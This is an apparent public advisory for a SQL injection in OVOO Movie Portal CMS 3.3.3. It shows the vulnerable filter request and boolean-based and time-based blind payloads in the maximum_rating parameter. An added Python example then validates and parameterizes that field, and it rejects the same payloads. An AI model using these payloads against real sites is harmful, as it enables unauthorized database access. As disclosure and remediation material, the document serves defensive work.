OVOO Movie Portal CMS 3.3.3 SQL Injection
OVOO Movie Portal CMS version 3.3.3 suffers from a remote SQL injection vulnerability.
# Exploit Title: OVOO Movie Portal CMS v3.3.3 - SQL Injection
# Date: 2023-08-12
# Exploit Author: Ahmet Ümit BAYRAM
# Vendor: https://codecanyon.net/item/ovoomovie-video-streaming-cms-with-unlimited-tvseries/20180569
# Tested on: Kali Linux & MacOS
# CVE: N/A

### Request ###

POST /filter_movies/1 HTTP/2
Host: localhost
Cookie: ci_session=tiic5hcli8v3qkg1chgj0dqpou9495us
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/116.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://localhost/movies.html
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 60
Origin: htts://localhost
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
Te: trailers

action=fetch_data&minimum_rating=1&maximum_rating=6.8&page=1

### Parameter & Payloads ###

Parameter: maximum_rating (POST)

Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: action=fetch_data&minimum_rating=1&maximum_rating=6.8 AND 2238=2238&page=1

Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: action=fetch_data&minimum_rating=1&maximum_rating=6.8 AND (SELECT 4101 FROM (SELECT(SLEEP(5)))FLwc)&page=1
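
A server-side fix for the maximum_rating parameter described above, as an added example that is not part of the original advisory or the vendor's code: the handler accepts only a plain decimal rating and binds both values as query parameters. The table, the 0 to 10 rating range and all function names are assumptions, and SQLite stands in for the MySQL backend.

```python
import re
import sqlite3
from urllib.parse import parse_qs

RATING_RE = re.compile(r"\d{1,2}(\.\d{1,2})?")  # a plain decimal and nothing else

# Request bodies from the advisory: the normal request, then its two payloads.
BODIES = [
    "action=fetch_data&minimum_rating=1&maximum_rating=6.8&page=1",
    "action=fetch_data&minimum_rating=1&maximum_rating=6.8 AND 2238=2238&page=1",
    "action=fetch_data&minimum_rating=1&maximum_rating=6.8 AND (SELECT 4101 FROM (SELECT(SLEEP(5)))FLwc)&page=1",
]

def make_db():
    """Constructed stand-in table; the product's real schema is not on the page."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE movies (title TEXT, rating REAL)")
    db.executemany("INSERT INTO movies VALUES (?, ?)", [("A", 5.5), ("B", 6.8), ("C", 8.1)])
    return db

def parse_rating(raw, lo=0.0, hi=10.0):
    """Return raw as a float, or raise ValueError (0-10 scale is an assumption)."""
    if not RATING_RE.fullmatch(raw):
        raise ValueError(f"rating is not a plain decimal: {raw!r}")
    value = float(raw)
    if not lo <= value <= hi:
        raise ValueError(f"rating out of range: {value}")
    return value

def filter_movies(db, body):
    """Hypothetical handler for the filter request: validate first, then bind."""
    form = parse_qs(body, keep_blank_values=True)
    lo = parse_rating(form.get("minimum_rating", [""])[0])
    hi = parse_rating(form.get("maximum_rating", [""])[0])
    if lo > hi:
        raise ValueError("minimum_rating exceeds maximum_rating")
    # Placeholders keep the request values out of the SQL text entirely.
    rows = db.execute(
        "SELECT title FROM movies WHERE rating BETWEEN ? AND ? ORDER BY title", (lo, hi))
    return [r[0] for r in rows]

def run_samples():
    """Run every sample body through the handler; 'rejected' marks a ValueError."""
    db, out = make_db(), []
    for body in BODIES:
        try:
            out.append(filter_movies(db, body))
        except ValueError:
            out.append("rejected")
    return out
```

Rejected requests are worth logging with the raw parameter value, since a non-numeric maximum_rating never occurs in normal use of the filter form.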